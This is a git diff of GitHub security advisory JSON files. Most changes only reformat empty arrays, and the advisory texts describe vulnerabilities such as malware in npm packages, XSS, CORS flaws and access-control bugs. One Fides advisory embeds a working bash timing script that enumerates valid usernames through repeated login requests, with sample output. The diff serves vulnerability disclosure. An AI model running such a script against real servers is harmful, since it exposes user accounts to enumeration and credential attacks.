.../05/GHSA-cjw7-m4qf-xc59/GHSA-cjw7-m4qf-xc59.json | 12 +++--------- .../05/GHSA-cwgg-8744-62hw/GHSA-cwgg-8744-62hw.json | 12 +++--------- .../05/GHSA-cwj6-5v55-7mj7/GHSA-cwj6-5v55-7mj7.json | 12 +++--------- .../05/GHSA-fj34-p4r2-ghh5/GHSA-fj34-p4r2-ghh5.json | 12 +++--------- .../05/GHSA-fw4j-88v3-6hfw/GHSA-fw4j-88v3-6hfw.json | 12 +++--------- .../05/GHSA-g2fc-vv42-p4pc/GHSA-g2fc-vv42-p4pc.json | 12 +++--------- .../05/GHSA-g3v4-6rhh-7539/GHSA-g3v4-6rhh-7539.json | 12 +++--------- .../05/GHSA-g595-9cfg-4hxm/GHSA-g595-9cfg-4hxm.json | 12 +++--------- .../05/GHSA-g74p-v363-hqxr/GHSA-g74p-v363-hqxr.json | 8 ++------ .../05/GHSA-g7gx-qmj4-gxrc/GHSA-g7gx-qmj4-gxrc.json | 12 +++--------- .../05/GHSA-g7hp-974g-6wg8/GHSA-g7hp-974g-6wg8.json | 4 +--- .../05/GHSA-g97v-hf56-5335/GHSA-g97v-hf56-5335.json | 12 +++--------- .../05/GHSA-gg86-5h5f-jrwx/GHSA-gg86-5h5f-jrwx.json | 12 +++--------- .../05/GHSA-gjqw-82j7-2f3q/GHSA-gjqw-82j7-2f3q.json | 12 +++--------- .../05/GHSA-gp7w-fhxq-93jr/GHSA-gp7w-fhxq-93jr.json | 4 +--- .../05/GHSA-gr8g-fg7p-9238/GHSA-gr8g-fg7p-9238.json | 12 +++--------- .../05/GHSA-grwp-8243-xpjh/GHSA-grwp-8243-xpjh.json | 12 +++--------- .../05/GHSA-gx2j-3fvm-rqj3/GHSA-gx2j-3fvm-rqj3.json | 12 +++--------- .../05/GHSA-h423-6g7m-qpqq/GHSA-h423-6g7m-qpqq.json | 12 +++--------- .../05/GHSA-hgvv-c4m6-65wv/GHSA-hgvv-c4m6-65wv.json | 8 ++------ .../05/GHSA-hw2j-3fc3-hf74/GHSA-hw2j-3fc3-hf74.json | 12 +++--------- .../05/GHSA-hxrc-p4fv-gc5g/GHSA-hxrc-p4fv-gc5g.json | 4 +--- .../05/GHSA-hxrw-3c72-p9hc/GHSA-hxrw-3c72-p9hc.json | 8 ++------ .../05/GHSA-j8g9-5p8g-4f3x/GHSA-j8g9-5p8g-4f3x.json | 12 +++--------- .../05/GHSA-jpfh-4v99-5m27/GHSA-jpfh-4v99-5m27.json | 12 +++--------- .../05/GHSA-jx29-4rmr-vrj4/GHSA-jx29-4rmr-vrj4.json | 8 ++------ .../05/GHSA-mjhg-c85c-62fv/GHSA-mjhg-c85c-62fv.json | 12 +++--------- .../05/GHSA-mrm7-vh23-g98v/GHSA-mrm7-vh23-g98v.json | 12 +++--------- .../05/GHSA-mv9f-845w-2cgm/GHSA-mv9f-845w-2cgm.json | 12 +++--------- .../05/GHSA-mvc4-fr9f-g4j8/GHSA-mvc4-fr9f-g4j8.json | 4 +--- .../05/GHSA-p2qw-28x5-q4gw/GHSA-p2qw-28x5-q4gw.json | 12 +++--------- .../05/GHSA-p52g-5qgx-4crw/GHSA-p52g-5qgx-4crw.json | 12 +++--------- .../05/GHSA-p793-3f2h-38xw/GHSA-p793-3f2h-38xw.json | 12 +++--------- .../05/GHSA-pcr5-v468-562j/GHSA-pcr5-v468-562j.json | 12 +++--------- .../05/GHSA-pmmh-7pm7-hc62/GHSA-pmmh-7pm7-hc62.json | 12 +++--------- .../05/GHSA-prq2-qj2r-jcgv/GHSA-prq2-qj2r-jcgv.json | 12 +++--------- .../05/GHSA-pxqq-3ph7-mw6w/GHSA-pxqq-3ph7-mw6w.json | 12 +++--------- .../05/GHSA-q262-3hfr-f5q4/GHSA-q262-3hfr-f5q4.json | 4 +--- .../05/GHSA-qj68-9gpw-8pq2/GHSA-qj68-9gpw-8pq2.json | 12 +++--------- .../05/GHSA-qpf6-m6mq-hcmq/GHSA-qpf6-m6mq-hcmq.json | 12 +++--------- .../05/GHSA-qqw5-j897-27cf/GHSA-qqw5-j897-27cf.json | 12 +++--------- .../05/GHSA-qxcq-r5q3-4wq6/GHSA-qxcq-r5q3-4wq6.json | 8 ++------ .../05/GHSA-qxvg-qh99-hg66/GHSA-qxvg-qh99-hg66.json | 12 +++--------- .../05/GHSA-rcjv-j3v6-r6cv/GHSA-rcjv-j3v6-r6cv.json | 12 +++--------- .../05/GHSA-rr3f-v8j5-mmr6/GHSA-rr3f-v8j5-mmr6.json | 12 +++--------- .../05/GHSA-rrv6-pjjr-4r3x/GHSA-rrv6-pjjr-4r3x.json | 8 ++------ .../05/GHSA-rwqc-8qvc-52fh/GHSA-rwqc-8qvc-52fh.json | 8 ++------ .../05/GHSA-vqc4-qhx7-82xg/GHSA-vqc4-qhx7-82xg.json | 8 ++------ .../05/GHSA-w5h4-c4xx-3r8p/GHSA-w5h4-c4xx-3r8p.json | 12 +++--------- .../05/GHSA-w825-9xqr-f6q3/GHSA-w825-9xqr-f6q3.json | 12 +++--------- .../05/GHSA-w883-jj58-rv96/GHSA-w883-jj58-rv96.json | 12 +++--------- .../05/GHSA-wc9c-rv2v-442r/GHSA-wc9c-rv2v-442r.json | 12 +++--------- .../05/GHSA-wgwm-v825-xmjx/GHSA-wgwm-v825-xmjx.json | 12 +++--------- .../05/GHSA-wr5g-85mp-25c9/GHSA-wr5g-85mp-25c9.json | 12 +++--------- .../05/GHSA-wxhc-3989-9jq8/GHSA-wxhc-3989-9jq8.json | 12 +++--------- .../05/GHSA-x52v-qr6m-xx85/GHSA-x52v-qr6m-xx85.json | 12 +++--------- .../05/GHSA-x56w-x8rv-273m/GHSA-x56w-x8rv-273m.json | 12 +++--------- .../05/GHSA-xp6h-p4cj-42w8/GHSA-xp6h-p4cj-42w8.json | 4 +--- .../05/GHSA-xqq2-v4rf-49qr/GHSA-xqq2-v4rf-49qr.json | 12 +++--------- .../05/GHSA-xwrf-hhx9-vmhv/GHSA-xwrf-hhx9-vmhv.json | 12 +++--------- .../06/GHSA-f935-6jhc-wv29/GHSA-f935-6jhc-wv29.json | 4 +--- .../07/GHSA-27h8-4rhj-pqp5/GHSA-27h8-4rhj-pqp5.json | 4 +--- .../07/GHSA-vg8h-hxwq-mx5r/GHSA-vg8h-hxwq-mx5r.json | 4 +--- .../07/GHSA-wjx3-rm5m-37gm/GHSA-wjx3-rm5m-37gm.json | 4 +--- .../08/GHSA-f2gw-3cqw-xmj7/GHSA-f2gw-3cqw-xmj7.json | 4 +--- .../09/GHSA-2vgj-5cmq-q6q3/GHSA-2vgj-5cmq-q6q3.json | 4 +--- .../09/GHSA-67q3-cfc5-wcpq/GHSA-67q3-cfc5-wcpq.json | 4 +--- .../09/GHSA-6g49-7hrc-9j92/GHSA-6g49-7hrc-9j92.json | 4 +--- .../09/GHSA-7h55-66vh-33gg/GHSA-7h55-66vh-33gg.json | 12 +++--------- .../09/GHSA-82q8-gr92-pr6w/GHSA-82q8-gr92-pr6w.json | 12 +++--------- .../09/GHSA-8c2m-6m99-9w9r/GHSA-8c2m-6m99-9w9r.json | 4 +--- .../09/GHSA-gpvf-6hpf-4f9h/GHSA-gpvf-6hpf-4f9h.json | 4 +--- .../09/GHSA-h4gc-cjxx-79fw/GHSA-h4gc-cjxx-79fw.json | 4 +--- .../09/GHSA-hph4-74mx-4369/GHSA-hph4-74mx-4369.json | 4 +--- .../09/GHSA-hwvg-2jxc-754g/GHSA-hwvg-2jxc-754g.json | 4 +--- .../09/GHSA-mmm5-wgvp-wp8r/GHSA-mmm5-wgvp-wp8r.json | 4 +--- .../09/GHSA-mq6r-xpp8-hm92/GHSA-mq6r-xpp8-hm92.json | 4 +--- .../09/GHSA-pf52-hh8x-27rf/GHSA-pf52-hh8x-27rf.json | 4 +--- .../09/GHSA-pm7g-mpjq-33gr/GHSA-pm7g-mpjq-33gr.json | 4 +--- .../09/GHSA-x32q-36fr-233c/GHSA-x32q-36fr-233c.json | 4 +--- 969 files changed, 2208 insertions(+), 6624 deletions(-) diff --git a/advisories/github-reviewed/2021/10/GHSA-m836-gxwq-j2pm/GHSA-m836-gxwq-j2pm.json b/advisories/github-reviewed/2021/10/GHSA-m836-gxwq-j2pm/GHSA-m836-gxwq-j2pm.json index fa68f5e5a79..16f91335826 100644 --- a/advisories/github-reviewed/2021/10/GHSA-m836-gxwq-j2pm/GHSA-m836-gxwq-j2pm.json +++ b/advisories/github-reviewed/2021/10/GHSA-m836-gxwq-j2pm/GHSA-m836-gxwq-j2pm.json @@ -3,9 +3,7 @@ "id": "GHSA-m836-gxwq-j2pm", "modified": "2021-10-27T18:58:30Z", "published": "2021-10-28T16:27:03Z", - "aliases": [ - - ], + "aliases": [], "summary": "Improper Access Control in github.com/treeverse/lakefs", "details": "### Impact\n\n1. [medium] A user with write permissions to a portion of a repository may use the S3 gateway to copy any object in the repository if they know its name.\n1. [medium] A user with permission to write any one of tags, branches, or commits on a repository may write all of them.\n1. [low] A user with permission to read any one of tags, branches, or commits on a repository may read all of them.\n1. [low] A user allowed to list objects in a repository _or_ read repository meta-data may retrieve graveler information about the location on underlying storage of all objects stored in any commit that they can view. If the user additionally has the capability to read underlying storage, they will be able to retrieve metadata associated with all objects in that commit.\n\n### For more information\n\nIf you have any questions or comments about this advisory please:\n* Email us at security@treeverse.io.\n* Open an issue on https://github.com/treeverse/lakeFS/issues/new.\n", "severity": [ diff --git a/advisories/github-reviewed/2021/11/GHSA-73qr-pfmq-6rp8/GHSA-73qr-pfmq-6rp8.json b/advisories/github-reviewed/2021/11/GHSA-73qr-pfmq-6rp8/GHSA-73qr-pfmq-6rp8.json index 1ef00405a9c..af79720dbcf 100644 --- a/advisories/github-reviewed/2021/11/GHSA-73qr-pfmq-6rp8/GHSA-73qr-pfmq-6rp8.json +++ b/advisories/github-reviewed/2021/11/GHSA-73qr-pfmq-6rp8/GHSA-73qr-pfmq-6rp8.json @@ -3,14 +3,10 @@ "id": "GHSA-73qr-pfmq-6rp8", "modified": "2022-09-07T22:16:29Z", "published": "2021-11-04T16:22:28Z", - "aliases": [ - - ], + "aliases": [], "summary": "Embedded malware in coa", "details": "The npm package `coa` had versions published with malicious code. Users of affected versions (2.0.3 and above) should downgrade to 2.0.2 as soon as possible and check their systems for suspicious activity. See [this issue](https://github.com/veged/coa/issues/99) for details as they unfold.\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", - "severity": [ - - ], + "severity": [], "affected": [ { "package": { diff --git a/advisories/github-reviewed/2021/11/GHSA-g2q5-5433-rhrf/GHSA-g2q5-5433-rhrf.json b/advisories/github-reviewed/2021/11/GHSA-g2q5-5433-rhrf/GHSA-g2q5-5433-rhrf.json index a6918e88180..3544d21e980 100644 --- a/advisories/github-reviewed/2021/11/GHSA-g2q5-5433-rhrf/GHSA-g2q5-5433-rhrf.json +++ b/advisories/github-reviewed/2021/11/GHSA-g2q5-5433-rhrf/GHSA-g2q5-5433-rhrf.json @@ -3,14 +3,10 @@ "id": "GHSA-g2q5-5433-rhrf", "modified": "2022-09-07T22:17:03Z", "published": "2021-11-04T16:24:44Z", - "aliases": [ - - ], + "aliases": [], "summary": "Embedded malware in rc", "details": "The npm package `rc` had versions published with malicious code. Users of affected versions (1.2.9, 1.3.9, and 2.3.9) should downgrade to 1.2.8 as soon as possible and check their systems for suspicious activity.\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", - "severity": [ - - ], + "severity": [], "affected": [ { "package": { diff --git a/advisories/github-reviewed/2022/05/GHSA-574f-mh6m-c6qm/GHSA-574f-mh6m-c6qm.json b/advisories/github-reviewed/2022/05/GHSA-574f-mh6m-c6qm/GHSA-574f-mh6m-c6qm.json index 88b8207da35..d1b1ab43545 100644 --- a/advisories/github-reviewed/2022/05/GHSA-574f-mh6m-c6qm/GHSA-574f-mh6m-c6qm.json +++ b/advisories/github-reviewed/2022/05/GHSA-574f-mh6m-c6qm/GHSA-574f-mh6m-c6qm.json @@ -8,9 +8,7 @@ ], "summary": "MoinMoin has multiple vulnerabilities related to superuser list, xmlrpc and OpenID configuration", "details": "Unspecified vulnerability in MoinMoin 1.5.x through 1.7.x, 1.8.x before 1.8.7, and 1.9.x before 1.9.2 has unknown impact and attack vectors, related to configurations that have a non-empty superuser list, the xmlrpc action enabled, the SyncPages action enabled, or OpenID configured.", - "severity": [ - - ], + "severity": [], "affected": [ { "package": { @@ -130,9 +128,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2024-04-29T11:24:59Z", diff --git a/advisories/github-reviewed/2022/05/GHSA-977v-29j9-9rxc/GHSA-977v-29j9-9rxc.json b/advisories/github-reviewed/2022/05/GHSA-977v-29j9-9rxc/GHSA-977v-29j9-9rxc.json index 8eb9e2deed1..d58c46ab23a 100644 --- a/advisories/github-reviewed/2022/05/GHSA-977v-29j9-9rxc/GHSA-977v-29j9-9rxc.json +++ b/advisories/github-reviewed/2022/05/GHSA-977v-29j9-9rxc/GHSA-977v-29j9-9rxc.json @@ -8,9 +8,7 @@ ], "summary": "MoinMoin improper sanitizes user profiles", "details": "MoinMoin before 1.8.7 and 1.9.x before 1.9.2 does not properly sanitize user profiles, which has unspecified impact and attack vectors.", - "severity": [ - - ], + "severity": [], "affected": [ { "package": { @@ -106,9 +104,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2024-04-29T11:36:09Z", diff --git a/advisories/github-reviewed/2022/05/GHSA-cmpm-jg8r-fv37/GHSA-cmpm-jg8r-fv37.json b/advisories/github-reviewed/2022/05/GHSA-cmpm-jg8r-fv37/GHSA-cmpm-jg8r-fv37.json index e50a9b34130..bc8097f4f3e 100644 --- a/advisories/github-reviewed/2022/05/GHSA-cmpm-jg8r-fv37/GHSA-cmpm-jg8r-fv37.json +++ b/advisories/github-reviewed/2022/05/GHSA-cmpm-jg8r-fv37/GHSA-cmpm-jg8r-fv37.json @@ -8,9 +8,7 @@ ], "summary": "Apache Struts Multiple Cross-site Scripting Vulnerabilities", "details": "Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.14 and 2.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) lastName parameter to `struts2-showcase/person/editPerson.action`, or the (3) clientName parameter to `struts2-rest-showcase/orders`.", - "severity": [ - - ], + "severity": [], "affected": [ { "package": { diff --git a/advisories/github-reviewed/2022/05/GHSA-phw8-fw9g-v3xc/GHSA-phw8-fw9g-v3xc.json b/advisories/github-reviewed/2022/05/GHSA-phw8-fw9g-v3xc/GHSA-phw8-fw9g-v3xc.json index 73373aab3ce..3c8a28f23ee 100644 --- a/advisories/github-reviewed/2022/05/GHSA-phw8-fw9g-v3xc/GHSA-phw8-fw9g-v3xc.json +++ b/advisories/github-reviewed/2022/05/GHSA-phw8-fw9g-v3xc/GHSA-phw8-fw9g-v3xc.json @@ -8,9 +8,7 @@ ], "summary": "Apache QPID Allows Remote Authentication Bypass", "details": "Apache QPID 0.14, 0.16, and earlier uses a NullAuthenticator mechanism to authenticate catch-up shadow connections to AMQP brokers, which allows remote attackers to bypass authentication.", - "severity": [ - - ], + "severity": [], "affected": [ { "package": { diff --git a/advisories/github-reviewed/2024/03/GHSA-3x9g-xfj5-fq84/GHSA-3x9g-xfj5-fq84.json b/advisories/github-reviewed/2024/03/GHSA-3x9g-xfj5-fq84/GHSA-3x9g-xfj5-fq84.json index 846c92b1b89..908f3d66baa 100644 --- a/advisories/github-reviewed/2024/03/GHSA-3x9g-xfj5-fq84/GHSA-3x9g-xfj5-fq84.json +++ b/advisories/github-reviewed/2024/03/GHSA-3x9g-xfj5-fq84/GHSA-3x9g-xfj5-fq84.json @@ -4,9 +4,7 @@ "modified": "2024-05-21T14:43:32Z", "published": "2024-03-21T21:31:15Z", "withdrawn": "2024-05-21T14:43:32Z", - "aliases": [ - - ], + "aliases": [], "summary": "Duplicate Advisory: Cross-Site Request Forgery in Gradio", "details": "## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-48cq-79qq-6f7x. this link is maintained to preserve external references.\n\n## Original Description\nA Cross-Site Request Forgery gives attackers the ability to upload many large files to a victim, if they are running Gradio locally. To resolve this a PR tightening the CORS rules around Gradio applications has been submitted. In particular, it checks to see if the host header is localhost (or one of its aliases) and if so, it requires the origin header (if present) to be localhost (or one of its aliases) as well.\n\n", "severity": [ diff --git a/advisories/github-reviewed/2024/05/GHSA-jj54-5q2m-q7pj/GHSA-jj54-5q2m-q7pj.json b/advisories/github-reviewed/2024/05/GHSA-jj54-5q2m-q7pj/GHSA-jj54-5q2m-q7pj.json index 064365ae6d9..3a17bd7120e 100644 --- a/advisories/github-reviewed/2024/05/GHSA-jj54-5q2m-q7pj/GHSA-jj54-5q2m-q7pj.json +++ b/advisories/github-reviewed/2024/05/GHSA-jj54-5q2m-q7pj/GHSA-jj54-5q2m-q7pj.json @@ -8,9 +8,7 @@ ], "summary": "NATS server TLS missing ciphersuite settings when CLI flags used", "details": "(This advisory is canonically )\n\n### Problem Description\n\nThe NATS server by default uses a restricted set of modern ciphersuites for TLS. This selection can be overridden through configuration. The defaults include just RSA and ECDSA with either AES/GCM with a SHA2 digest or ChaCha20/Poly1305.\n\nThe configuration system allows for extensive use of CLI options to override configuration settings. When using these to set a key/cert for TLS, the restricted ciphersuite settings were lost, enabling all ciphersuites supported by Go by default.\n\nNone of these additional ciphersuites are broken, so the NATS maintainers have fixed this in public git and the next release is not being hurried, nor is this security advisory embargoed.\n\n\n### Affected versions\n\nNATS Server:\n * All versions prior to 2.2.3\n * fixed with nats-io/nats-server commit ffccc2e1bd (2021-04-29)\n\n\n### Impact\n\nIf a server administrator chooses to start the nats-server with TLS configuration parameters provided on the command-line, then clients can negotiate TLS ciphersuites which were not expected.\n\n\n### Workaround\n\nUse a configuration file to set the TLS parameters instead of command-line options.\n\n\n### Solution\n\nUpgrade the NATS server.\n\n\n### Credits\n\nThis issue was identified and reported by SimCorp.", - "severity": [ - - ], + "severity": [], "affected": [ { "package": { @@ -55,9 +53,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": true, "github_reviewed_at": "2024-05-14T22:03:51Z", diff --git a/advisories/github-reviewed/2024/05/GHSA-v84h-653v-4pq9/GHSA-v84h-653v-4pq9.json b/advisories/github-reviewed/2024/05/GHSA-v84h-653v-4pq9/GHSA-v84h-653v-4pq9.json index e792e9b4539..cfa10fa6707 100644 --- a/advisories/github-reviewed/2024/05/GHSA-v84h-653v-4pq9/GHSA-v84h-653v-4pq9.json +++ b/advisories/github-reviewed/2024/05/GHSA-v84h-653v-4pq9/GHSA-v84h-653v-4pq9.json @@ -3,9 +3,7 @@ "id": "GHSA-v84h-653v-4pq9", "modified": "2024-05-21T15:39:20Z", "published": "2024-05-03T17:34:21Z", - "aliases": [ - - ], + "aliases": [], "summary": "Some CORS middleware allow untrusted origins", "details": "### Impact\n\nSome CORS middleware (more specifically those created by specifying two or more origin patterns whose hosts share a proper suffix) incorrectly allow some untrusted origins, thereby opening the door to cross-origin attacks from the untrusted origins in question.\n\nFor example, specifying origin patterns `https://foo.com` and `https://bar.com` (in that order) would yield a middleware that would incorrectly allow untrusted origin `https://barfoo.com`.\n\n### Patches\n\nPatched in v0.9.0.\n\n### Workarounds\n\nNone.\n", "severity": [ @@ -57,9 +55,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2024-05-03T17:34:21Z", diff --git a/advisories/github-reviewed/2024/05/GHSA-vhxv-fg4m-p2w8/GHSA-vhxv-fg4m-p2w8.json b/advisories/github-reviewed/2024/05/GHSA-vhxv-fg4m-p2w8/GHSA-vhxv-fg4m-p2w8.json index e328615937f..22814843774 100644 --- a/advisories/github-reviewed/2024/05/GHSA-vhxv-fg4m-p2w8/GHSA-vhxv-fg4m-p2w8.json +++ b/advisories/github-reviewed/2024/05/GHSA-vhxv-fg4m-p2w8/GHSA-vhxv-fg4m-p2w8.json @@ -3,9 +3,7 @@ "id": "GHSA-vhxv-fg4m-p2w8", "modified": "2024-05-21T15:38:55Z", "published": "2024-05-03T17:34:17Z", - "aliases": [ - - ], + "aliases": [], "summary": "Some CORS middleware allow untrusted origins", "details": "### Impact\n\nSome CORS middleware (more specifically those created by specifying two or more origin patterns whose hosts share a proper suffix) incorrectly allow some untrusted origins, thereby opening the door to cross-origin attacks from the untrusted origins in question.\n\nFor example, specifying origin patterns `https://foo.com` and `https://bar.com` (in that order) would yield a middleware that would incorrectly allow untrusted origin `https://barfoo.com`.\n\n### Patches\n\nPatched in v0.1.3.\n\n### Workarounds\n\nNone.", "severity": [ @@ -54,9 +52,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2024-05-03T17:34:17Z", diff --git a/advisories/github-reviewed/2024/09/GHSA-2h46-8gf5-fmxv/GHSA-2h46-8gf5-fmxv.json b/advisories/github-reviewed/2024/09/GHSA-2h46-8gf5-fmxv/GHSA-2h46-8gf5-fmxv.json index a3114d4b383..6511a858a8e 100644 --- a/advisories/github-reviewed/2024/09/GHSA-2h46-8gf5-fmxv/GHSA-2h46-8gf5-fmxv.json +++ b/advisories/github-reviewed/2024/09/GHSA-2h46-8gf5-fmxv/GHSA-2h46-8gf5-fmxv.json @@ -8,9 +8,7 @@ ], "summary": "Timing-Based Username Enumeration Vulnerability in Fides Webserver Authentication", "details": "A timing-based username enumeration vulnerability has been identified in Fides Webserver authentication. This vulnerability allows an unauthenticated attacker to determine the existence of valid usernames by analyzing the time it takes for the server to respond to login requests. The discrepancy in response times between valid and invalid usernames can be leveraged to enumerate users on the system.\n\n### Impact\nThis vulnerability enables a timing-based username enumeration attack. An attacker can systematically guess and verify which usernames are valid by measuring the server's response time to authentication requests. This information can be used to conduct further attacks on authentication such as password brute-forcing and credential stuffing.\n\n### Patches\nThe vulnerability has been patched in Fides version `2.44.0`. Users are advised to upgrade to this version or later to secure their systems against this threat.\n\n### Workarounds\nThere are no workarounds.\n\n\n### Proof of Concept\n\n1. Create a valid user called `valid_user` on a remote Fides server. Ensure that there is no user on the server named `invalid_user`. Note that this vulnerability is not reproducible on a local deployment due to the extremely low latency of responses to login requests.\n2. In a terminal run `export LOGIN_URL='https://example.com/api/v1/login'`, replacing `example.com` with your remote Fides server's domain or IP address.\n3. In the same terminal run `exploit-poc.sh` (detailed below).\n4. It's possible to distinguish between valid and invalid users based on the low latency (time difference) for invalid users. \n\n\n
\nExploit PoC script\n\n```bash\n#!/bin/bash\n\n# Function to test login and calculate average transfer times\ntest_login(){\n echo -e \"\\nTesting login for user: $1\\n\"\n total_diff=0\n\n for (( i=1; i <= 20; ++i ))\n do\n echo -n \"Attempt #$i: \"\n resp=$(curl -w @- \"$LOGIN_URL\" \\\n -H 'content-type: application/json' \\\n --data-raw '{\"username\":\"'$1'\",\"password\":\"d3JvbmdwYXNzd29yZA==\"}' \\\n -o /dev/null -s <<'EOF'\n {\n \"pretransfer\": %{time_pretransfer},\n \"starttransfer\": %{time_starttransfer}\n }\nEOF\n )\n \n pre=$(echo $resp | jq '.pretransfer')\n start=$(echo $resp | jq '.starttransfer')\n diff=$(echo \"$start - $pre\" | bc)\n\n # Accumulate total diff\n total_diff=$(echo \"$total_diff + $diff\" | bc)\n \n # Print the result of this iteration\n printf \"Pretransfer: %.4f, Starttransfer: %.4f, Diff: %.4f\\n\" \"$pre\" \"$start\" \"$diff\"\n done\n \n # Calculate average diff\n avg_diff=$(echo \"scale=4; $total_diff / 20\" | bc)\n \n # Print average time\n echo -e \"\\nAverage Time Difference for $1: $avg_diff seconds\\n\"\n}\n\n# Ensure that LOGIN_URL is set\nif [ -z \"$LOGIN_URL\" ]; then\n echo \"Error: LOGIN_URL environment variable is not set.\"\n exit 1\nfi\n\n# Test valid and invalid users\ntest_login valid_user \ntest_login invalid_user\n```\n\n
\n\n\n
\nSample script run\n\n\n```\n~ ❯ ./exploit-poc.sh\n\nTesting login for user: valid_user\n\nAttempt #1: Pretransfer: 0.3006, Starttransfer: 0.7404, Diff: 0.4398\nAttempt #2: Pretransfer: 0.2755, Starttransfer: 1.2506, Diff: 0.9751\nAttempt #3: Pretransfer: 0.2595, Starttransfer: 0.7108, Diff: 0.4512\nAttempt #4: Pretransfer: 0.2551, Starttransfer: 1.0483, Diff: 0.7932\nAttempt #5: Pretransfer: 0.2553, Starttransfer: 0.6680, Diff: 0.4127\nAttempt #6: Pretransfer: 0.2599, Starttransfer: 0.6712, Diff: 0.4113\nAttempt #7: Pretransfer: 0.2518, Starttransfer: 0.6603, Diff: 0.4085\nAttempt #8: Pretransfer: 0.2467, Starttransfer: 0.6812, Diff: 0.4344\nAttempt #9: Pretransfer: 0.2502, Starttransfer: 0.8175, Diff: 0.5673\nAttempt #10: Pretransfer: 0.2583, Starttransfer: 0.6904, Diff: 0.4321\nAttempt #11: Pretransfer: 0.2573, Starttransfer: 0.6601, Diff: 0.4029\nAttempt #12: Pretransfer: 0.2481, Starttransfer: 0.8495, Diff: 0.6014\nAttempt #13: Pretransfer: 0.2487, Starttransfer: 0.6822, Diff: 0.4336\nAttempt #14: Pretransfer: 0.2526, Starttransfer: 0.9728, Diff: 0.7201\nAttempt #15: Pretransfer: 0.2573, Starttransfer: 0.9808, Diff: 0.7235\nAttempt #16: Pretransfer: 0.2459, Starttransfer: 0.6536, Diff: 0.4078\nAttempt #17: Pretransfer: 0.2508, Starttransfer: 0.9024, Diff: 0.6517\nAttempt #18: Pretransfer: 0.2477, Starttransfer: 2.2049, Diff: 1.9572\nAttempt #19: Pretransfer: 0.2523, Starttransfer: 2.1087, Diff: 1.8564\nAttempt #20: Pretransfer: 0.2523, Starttransfer: 0.7308, Diff: 0.4785\n\nAverage Time Difference for valid_user: .6779 seconds\n\n\nTesting login for user: invalid_user\n\nAttempt #1: Pretransfer: 0.2496, Starttransfer: 0.4122, Diff: 0.1626\nAttempt #2: Pretransfer: 0.2551, Starttransfer: 0.4049, Diff: 0.1498\nAttempt #3: Pretransfer: 0.2480, Starttransfer: 0.6174, Diff: 0.3694\nAttempt #4: Pretransfer: 0.2489, Starttransfer: 0.4611, Diff: 0.2122\nAttempt #5: Pretransfer: 0.2513, Starttransfer: 0.4601, Diff: 0.2088\nAttempt #6: Pretransfer: 0.2540, Starttransfer: 0.3946, Diff: 0.1406\nAttempt #7: Pretransfer: 0.2504, Starttransfer: 0.9104, Diff: 0.6599\nAttempt #8: Pretransfer: 0.2577, Starttransfer: 0.4095, Diff: 0.1518\nAttempt #9: Pretransfer: 0.2497, Starttransfer: 0.3851, Diff: 0.1353\nAttempt #10: Pretransfer: 0.2548, Starttransfer: 0.4024, Diff: 0.1476\nAttempt #11: Pretransfer: 0.2559, Starttransfer: 0.4002, Diff: 0.1443\nAttempt #12: Pretransfer: 0.2501, Starttransfer: 0.4075, Diff: 0.1573\nAttempt #13: Pretransfer: 0.2560, Starttransfer: 0.3921, Diff: 0.1361\nAttempt #14: Pretransfer: 0.2493, Starttransfer: 0.3933, Diff: 0.1440\nAttempt #15: Pretransfer: 0.2493, Starttransfer: 0.3942, Diff: 0.1449\nAttempt #16: Pretransfer: 0.2599, Starttransfer: 0.5111, Diff: 0.2512\nAttempt #17: Pretransfer: 0.2455, Starttransfer: 0.4128, Diff: 0.1673\nAttempt #18: Pretransfer: 0.2558, Starttransfer: 1.7535, Diff: 1.4977\nAttempt #19: Pretransfer: 0.2515, Starttransfer: 1.4528, Diff: 1.2013\nAttempt #20: Pretransfer: 0.2483, Starttransfer: 0.3893, Diff: 0.1410\n\nAverage Time Difference for invalid_user: .3161 seconds\n\n~ ❯\n```\n
\n\n### Severity\n\nThis vulnerability has been assigned a severity of LOW.\n\nUsing CVSS v3.1 it could be scored as`AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N` (5.3 Medium/Moderate) or `AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N` (0.0 None) depending on the Confidentiality impact metric used.\n\nIn [Bugcrowd's vulnerability rating taxonomy](https://bugcrowd.com/vulnerability-rating-taxonomy) it most likely be assigned a technical severity of P4 (Low) Broken Access Control (BAC) > Username/Email Enumeration > Non-Brute Force.", - "severity": [ - - ], + "severity": [], "affected": [ { "package": { diff --git a/advisories/github-reviewed/2024/09/GHSA-cxww-7g56-2vh6/GHSA-cxww-7g56-2vh6.json b/advisories/github-reviewed/2024/09/GHSA-cxww-7g56-2vh6/GHSA-cxww-7g56-2vh6.json index 65cea3ab949..458792f1b90 100644 --- a/advisories/github-reviewed/2024/09/GHSA-cxww-7g56-2vh6/GHSA-cxww-7g56-2vh6.json +++ b/advisories/github-reviewed/2024/09/GHSA-cxww-7g56-2vh6/GHSA-cxww-7g56-2vh6.json @@ -3,9 +3,7 @@ "id": "GHSA-cxww-7g56-2vh6", "modified": "2024-09-04T18:08:32Z", "published": "2024-09-03T20:55:34Z", - "aliases": [ - - ], + "aliases": [], "summary": "@actions/download-artifact has an Arbitrary File Write via artifact extraction", "details": "### Impact\n\nVersions of `actions/download-artifact` before 4.1.7 are vulnerable to arbitrary file write when downloading and extracting a specifically crafted artifact that contains path traversal filenames.\n\n### 